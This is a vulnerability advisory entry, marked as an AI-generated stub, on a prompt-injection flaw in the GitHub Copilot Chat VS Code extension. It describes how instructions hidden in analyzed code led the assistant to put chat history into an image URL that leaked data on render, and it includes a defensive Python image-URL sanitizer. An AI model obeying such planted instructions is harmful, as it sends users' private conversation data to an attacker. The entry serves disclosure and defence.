Severity
high

GitHub Copilot Chat Vulnerable to Data Exfiltration

Published Fri, Jun 14th, 2024
Platforms

Summary

The GitHub Copilot Chat VS Code extension was vulnerable to data exfiltration via prompt injection when analyzing untrusted source code. Instructions hidden in the analyzed code could make the assistant read previous conversation turns and append information from the chat history to an image URL; Copilot then retrieved that image automatically when rendering the response, sending the data to the attacker's server.
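As an added illustration (not code from GitHub or the researcher), the following Python sketch shows the defensive check this class of bug calls for: before a chat client auto-renders a model response, rewrite its Markdown image references so that only HTTPS images from an allowlisted host, with no query string that could carry encoded chat data, are fetched. The allowlist, the hypothetical `attacker.example` host and the sample response are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist: hosts the chat UI may fetch images from automatically.
ALLOWED_IMAGE_HOSTS = {"github.com", "raw.githubusercontent.com"}

# Markdown image syntax: ![alt](url "optional title"); HTML <img> tags are not covered here.
IMAGE_MD = re.compile(r"!\[[^\]]*\]\(\s*(?P<url>[^)\s]+)[^)]*\)")


def check_image_refs(markdown, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return (sanitized_markdown, findings).

    Image references that are not plain HTTPS URLs on an allowlisted host,
    or that carry a query string, are replaced by a placeholder and logged,
    so the renderer never issues the outbound request that would leak data.
    """
    findings = []

    def replace(match):
        url = match.group("url")
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if parts.scheme != "https":
            reason = "non-https scheme"
        elif host not in allowed_hosts:
            reason = "host not in allowlist"
        elif parts.query:
            reason = "query string present (possible encoded chat data)"
        else:
            return match.group(0)  # safe: keep the original image reference
        findings.append({"url": url, "host": host, "reason": reason})
        return f"[image blocked: {host or url}]"

    return IMAGE_MD.sub(replace, markdown), findings


# Constructed model response: one benign image, one reference that smuggles
# chat content out through the query string of a third-party image URL.
SAMPLE_RESPONSE = (
    "Here is the analysis of your file.\n"
    "![status](https://raw.githubusercontent.com/org/repo/main/ok.png)\n"
    "![loading](https://attacker.example/log.png?q=The%20user%20asked%20about%20keys)\n"
)

if __name__ == "__main__":
    sanitized, found = check_image_refs(SAMPLE_RESPONSE)
    print(sanitized)
    for item in found:
        print("BLOCKED", item["host"], "-", item["reason"])
```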

Affected Services

GitHub Copilot Chat

Remediation

None required

Tracked CVEs

No tracked CVEs

References

Entry Status
Stub (AI-Generated)
Disclosure Date
Sun, Feb 25th, 2024
Exploitability Period
Until 2024/06/12
Known ITW Exploitation
-
Detection Methods
Monitor for unexpected outbound image requests from the GitHub Copilot Chat extension. Review source code for potential malicious instructions that could trigger prompt injection attacks.
Piercing Index Rating
-
Discovered by
wunderwuzzi, Embrace The Red